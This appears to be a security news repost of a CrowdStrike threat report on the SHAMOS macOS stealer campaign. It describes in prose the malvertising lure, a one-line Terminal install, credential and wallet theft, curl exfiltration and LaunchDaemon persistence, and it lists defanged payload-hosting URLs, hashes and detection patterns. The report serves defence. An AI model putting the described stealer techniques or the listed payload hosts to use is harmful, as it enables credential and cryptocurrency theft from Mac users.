Cybersecurity researchers at CrowdStrike identified and thwarted a sophisticated malware campaign deploying SHAMOS, an advanced variant of the Atomic macOS Stealer (AMOS) malware, orchestrated by the cybercriminal group COOKIE SPIDER.
Operating under a malware-as-a-service model, COOKIE SPIDER rents out this information stealer to affiliates who target victims to harvest sensitive data, including login credentials, cryptocurrency wallets, and other personal information.
The campaign attempted to compromise over 300 customer environments but was successfully blocked by the CrowdStrike Falcon platform, highlighting the growing threat of macOS-specific malware in the eCrime ecosystem.
This operation relied on malvertising tactics, where fraudulent macOS help websites were promoted in search engine results, luring users seeking solutions for common issues like flushing the resolver cache.
Campaign Discovery
Victims from countries such as the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy were targeted, with a notable exclusion of Russia and Commonwealth of Independent States nations, aligning with prohibitions in Russian eCrime forums against attacking domestic users.
The malvertising directed users to spoofed sites mimicking legitimate macOS support pages, such as mac-safer[.]com and rescue-mac[.]com, which provided misleading instructions to execute a malicious one-line installation command in the Terminal.
This command, often Base64-encoded, downloaded a Bash script that captured the user’s password and fetched the SHAMOS Mach-O executable.
By exploiting this technique, attackers bypassed macOS Gatekeeper security checks, allowing direct installation of the malware without triggering standard protections.
Similar tactics have been observed in prior campaigns involving Cuckoo Stealer and SHAMOS, including malvertising for Homebrew between May 2024 and January 2025, as well as opportunistic GitHub repositories posing as free macOS tools like video editors, CAD software, and AI applications.
Persistence Mechanisms
Upon execution, the SHAMOS malware is downloaded to the /tmp/ directory, where it removes extended file attributes using xattr to evade detection, assigns executable permissions via chmod, and runs anti-VM checks to avoid sandbox environments.
It then leverages AppleScript for reconnaissance, scanning for cryptocurrency wallet files, Keychain data, Apple Notes, and browser credentials.
Collected data is archived into a ZIP file named out.zip and exfiltrated via curl commands to attacker-controlled servers.
Further payloads, including a spoofed Ledger Live wallet app and a botnet module, are deployed as hidden files in the user’s home directory.
If sudo privileges are available, SHAMOS establishes persistence by creating a Plist file (com.finder.helper.plist) in the LaunchDaemons directory, ensuring long-term access.
CrowdStrike’s observations noted multiple curl invocations indicative of botnet activity, underscoring the malware’s modular design for extended compromise.
Open-source reports corroborated these findings, detailing a related campaign via a fake GitHub repository mimicking iTerm2, a popular macOS terminal emulator.
This repository instructed users to run a similar one-line command, fetching SHAMOS from domains like macostutorial[.]com, demonstrating the actors’ preference for blending social engineering with technical evasion.
CrowdStrike assesses with high confidence that eCrime actors will persist in using malvertising and one-line installation commands for macOS stealer distribution, given their proven efficacy in bypassing Gatekeeper and driving victim traffic.
The Falcon platform’s machine learning and indicators of attack (IOAs) provide layered detection, preventing SHAMOS at download, execution, and exfiltration stages.
For protection, users should enable suspicious process prevention and intelligence-sourced threat prevention in Falcon Insight XDR policies.
Threat hunters can utilize Falcon Next-Gen SIEM queries to detect risky behaviors, such as Bash scripts calling dscl, curl, xattr, and chmod, or AppleScript executions from /tmp/ binaries.
Indicator of Compromise (IoCs)
| IOC Type | Description | Value |
|---|---|---|
| Malvertising Websites | Sites containing instructions to download SHAMOS | mac-safer[.]com rescue-mac[.]com https[:]//github[.]com/jeryrymoore/Iterm2 |
| Bash Script SHA256 Hashes | Hashes of malicious Bash scripts | 231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68 |
| SHAMOS Mach-O SHA256 Hashes | Hashes of SHAMOS executables | 4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5 a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322 95b97a5da68fcb73c98cd9311c56747545db5260122ddf6fae7b152d3d802877 |
| Bash Script Host URLs | URLs hosting malicious Bash scripts | https[:]//icloudservers[.]com/gm/install[.]sh https[:]//macostutorial[.]com/iterm2/install[.]sh |
| SHAMOS Host URLs | URLs hosting SHAMOS payloads | https[:]//icloudservers[.]com/gm/update https[:]//macostutorial[.]com/iterm2/update |
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
Source link
